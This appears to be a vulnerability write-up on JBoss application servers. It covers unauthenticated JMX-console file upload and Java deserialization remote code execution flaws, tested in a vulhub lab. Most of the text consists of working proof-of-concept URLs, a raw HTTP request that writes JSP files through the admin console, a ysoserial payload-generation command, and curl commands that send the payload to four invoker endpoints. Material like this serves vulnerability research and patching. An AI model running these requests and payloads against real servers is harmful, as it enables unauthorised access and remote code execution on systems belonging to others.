JBoss common vulnerabilities sorting

JBoss is an open source application server based on J2EE. The code follows the LGPL license and can be used for free in any commercial application; JBoss is also a container and server for managing EJBs. It supports EJB 1.1, EJB 2.0 and EJB3 specifications. However, JBoss core services do not include WEB containers that support servlets / JSPS, which are generally bound with Tomcat or Jetty.

JBoss high-risk vulnerabilities mainly involve the following two types.

• The first is to use unauthorized access to enter the JBoss background for file upload. For example, CVE-2007-1036, CVE-2010-0738,CVE-2006-5750 and void addURL() void deploy() upload war package.
• The other is the vulnerability of using Java deserialization for remote code execution, such as CVE-2015-7501, CVE-2017-7504, CVE-2017-12149, CVE-2013-4810.

Vulnerabilities caused by lax access control

CVE-2007-1036，CVE-2010-0738,CVE-2006-5750

CVE-2007-1036, CVE-2010-0738 and CVE-2006-5750 are all used. CVE-2006-5750 and CVE-2007-1036 are two different access methods of this address, resulting in two unauthorized access vulnerabilities. CVE-2010-0738 is a bypass of CVE-2007-1036.

The vulnerability page is as follows:

http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin:service=DeploymentFileRepository

CVE-2007-1036

poc is as follows, which will generate http://192.168.10.128:8080/b/b.jsp Page. The content of the page is test

http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=b.war&arg1=b&arg2=.jsp&arg3=%3C%25out.println%28%22test%22%29%3B%25%3E&arg4=True

CVE-2006-5750

poc is as follows, which will generate http://192.168.10.128:8080/b/b.jsp Page. The content of the page is test

http://192.168.64.129:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=c.war&argType=java.lang.String&arg1=c&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25out.println%28%22test%22%29%3B%25%3E&argType=boolean&arg4=True

CVE-2007-1036

The data package is as follows, which will be http://192.168.10.128:8080/b/b.jsp Page. The content of the page is test. Note that it is a HEAD request

HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=a.war&arg1=a&arg2=.jsp&arg3=%3C%25out.println%28%22test%22%29%3B%25%3E&arg4=True HTTP/1.1
Host: 192.168.10.128:8080
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
Origin: http://192.168.10.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin:service=DeploymentFileRepository
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=EB1FF2DBD5FAE956570012622CA45C8D
Connection: close

void addURL() void deploy() remotely upload war package getshell

Both of them take advantage of the unauthorized access of the whole background, or log in to the background with a weak password, and then deploy the war package to get the shell

void addURL()

Remote upload war access address

http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

void deploy()

Remote upload war package access address:

http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Aservice%3DMainDeployer

Vulnerability caused by deserialization

The previously exposed deserialization vulnerabilities mainly include cve-2017-7504, cve-2013-4810, cve-2015-7501 and cve-2017-12149. However, the utilization methods are completely the same because an interface will deserialize after receiving serialized data, which will trigger the deserialization vulnerability.

Therefore, these vulnerabilities can share one payload, but the requested path is different. (the scope of influence given on the Internet is not reliable. Using the CVE-2017-7504 test environment of vulhub, jboss version is 4.0.5. All the following four vulnerabilities have been tested successfully, so we can't determine whether there are vulnerabilities simply by looking at the version number)

The utilization method is as follows:

generate payload
java -jar ysoserial.jar CommonsCollections5 "touch /tmp/success" > 1.ser

# CVE-2017-7504
curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
# CVE-2013-4810
curl http://your-ip:8080/invoker/EJBInvokerServlet --data-binary @1.ser
# CVE-2015-7501
curl http://your-ip:8080/invoker/JMXInvokerServlet --data-binary @1.ser
# CVE-2017-12149
curl http://your-ip:8080/invoker/readonly --data-binary @1.ser

A success file can be generated after each request

You can simply judge whether there is a vulnerability according to the page, and visit these four pages respectively:

/jbossmq-httpil/HTTPServerILServlet:

/invoker/EJBInvokerServlet:

/invoker/JMXInvokerServlet:

/invoker/readonly:

Build a CVE-2017-12149 vulnerability environment with vulhub. Through script verification, it is found that except / jbossmq httpil / httpserverilservlet, the other three vulnerabilities are successfully exploited

Visit the address and find that this page does not exist